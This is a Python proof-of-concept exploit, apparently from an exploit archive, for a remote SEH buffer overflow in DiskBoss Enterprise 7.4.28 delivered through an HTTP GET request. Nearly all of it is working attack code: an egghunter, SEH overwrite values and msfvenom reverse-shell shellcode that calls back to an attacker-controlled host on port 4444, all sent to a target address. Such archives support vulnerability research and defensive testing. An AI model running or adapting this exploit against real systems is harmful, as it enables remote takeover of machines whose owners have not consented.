# Exploit Title: DiskBoss Enterprise 7.4.28 - 'GET' Remote Buffer Overflow (SEH - Egghunter)
# Date: 2025-05-05
# Exploit Author: Fernando Mengali
# Linkedin: https://www.linkedin.com/in/fernando-mengali-273504142/
# Vendor Homepage: https://www.diskboss.com
# Software Link: htt*ps://www.exploit-db.com/apps/71a11b97d2361389b9099e57f6400270-diskbossent_setup_v7.4.28.exe 
# Version: 7.4.28
# Tested on: Windows XP - SP3 - English

#!/usr/bin/python

import socket
import struct

offset = b"A"*2455

egghunter =  b""
egghunter += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
egghunter += b"\x2e\x3c\x05\x5a\x74\xef\xb8\x62\x30\x30\x6d"
egghunter += b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

offset += egghunter
offset += b"A"*(2485-(len(egghunter)+2455)) # offset total 2487

nseh = b"\xeb\xcc\x90\x90"   # jmp - 50
seh = struct.pack(b"<I",0x10016A70) #POP POP RETN 10016A70

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.232.129 LPORT=4444 -b "\x00\x0a\x0d\x09\x20" -f python -v shellcode
shellcode =  b""
shellcode += b"\xbe\xda\xe6\xea\xf9\xdb\xd6\xd9\x74\x24\xf4"
shellcode += b"\x5f\x31\xc9\xb1\x52\x31\x77\x12\x83\xc7\x04"
shellcode += b"\x03\xad\xe8\x08\x0c\xad\x1d\x4e\xef\x4d\xde"
shellcode += b"\x2f\x79\xa8\xef\x6f\x1d\xb9\x40\x40\x55\xef"
shellcode += b"\x6c\x2b\x3b\x1b\xe6\x59\x94\x2c\x4f\xd7\xc2"
shellcode += b"\x03\x50\x44\x36\x02\xd2\x97\x6b\xe4\xeb\x57"
shellcode += b"\x7e\xe5\x2c\x85\x73\xb7\xe5\xc1\x26\x27\x81"
shellcode += b"\x9c\xfa\xcc\xd9\x31\x7b\x31\xa9\x30\xaa\xe4"
shellcode += b"\xa1\x6a\x6c\x07\x65\x07\x25\x1f\x6a\x22\xff"
shellcode += b"\x94\x58\xd8\xfe\x7c\x91\x21\xac\x41\x1d\xd0"
shellcode += b"\xac\x86\x9a\x0b\xdb\xfe\xd8\xb6\xdc\xc5\xa3"
shellcode += b"\x6c\x68\xdd\x04\xe6\xca\x39\xb4\x2b\x8c\xca"
shellcode += b"\xba\x80\xda\x94\xde\x17\x0e\xaf\xdb\x9c\xb1"
shellcode += b"\x7f\x6a\xe6\x95\x5b\x36\xbc\xb4\xfa\x92\x13"
shellcode += b"\xc8\x1c\x7d\xcb\x6c\x57\x90\x18\x1d\x3a\xfd"
shellcode += b"\xed\x2c\xc4\xfd\x79\x26\xb7\xcf\x26\x9c\x5f"
shellcode += b"\x7c\xae\x3a\x98\x83\x85\xfb\x36\x7a\x26\xfc"
shellcode += b"\x1f\xb9\x72\xac\x37\x68\xfb\x27\xc7\x95\x2e"
shellcode += b"\xe7\x97\x39\x81\x48\x47\xfa\x71\x21\x8d\xf5"
shellcode += b"\xae\x51\xae\xdf\xc6\xf8\x55\x88\x28\x54\xbd"
shellcode += b"\xc9\xc1\xa7\x3d\xdb\x4d\x21\xdb\xb1\x7d\x67"
shellcode += b"\x74\x2e\xe7\x22\x0e\xcf\xe8\xf8\x6b\xcf\x63"
shellcode += b"\x0f\x8c\x9e\x83\x7a\x9e\x77\x64\x31\xfc\xde"
shellcode += b"\x7b\xef\x68\xbc\xee\x74\x68\xcb\x12\x23\x3f"
shellcode += b"\x9c\xe5\x3a\xd5\x30\x5f\x95\xcb\xc8\x39\xde"
shellcode += b"\x4f\x17\xfa\xe1\x4e\xda\x46\xc6\x40\x22\x46"
shellcode += b"\x42\x34\xfa\x11\x1c\xe2\xbc\xcb\xee\x5c\x17"
shellcode += b"\xa7\xb8\x08\xee\x8b\x7a\x4e\xef\xc1\x0c\xae"
shellcode += b"\x5e\xbc\x48\xd1\x6f\x28\x5d\xaa\x8d\xc8\xa2"
shellcode += b"\x61\x16\xf8\xe8\x2b\x3f\x91\xb4\xbe\x7d\xfc"
shellcode += b"\x46\x15\x41\xf9\xc4\x9f\x3a\xfe\xd5\xea\x3f"
shellcode += b"\xba\x51\x07\x32\xd3\x37\x27\xe1\xd4\x1d"

buf = b"D"*(6000-2487-len(shellcode))
nops = b"\x90"*32
payload = offset + nseh + seh + b"b00mb00m" + shellcode + buf

host = "192.168.232.146"
port = int(80)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))

req = b"GET /" + payload + b" HTTP/1.1\r\n"
req += b"Host: 192.168.232.129\r\n"
req += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\r\n"
req += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req += b"Accept-Language: en-US,en;q=0.5\r\n"
req += b"Accept-Encoding: gzip, deflate\r\n"
req += b"Connection: keep-alive\r\n\r\n"

s.send(req)
s.close()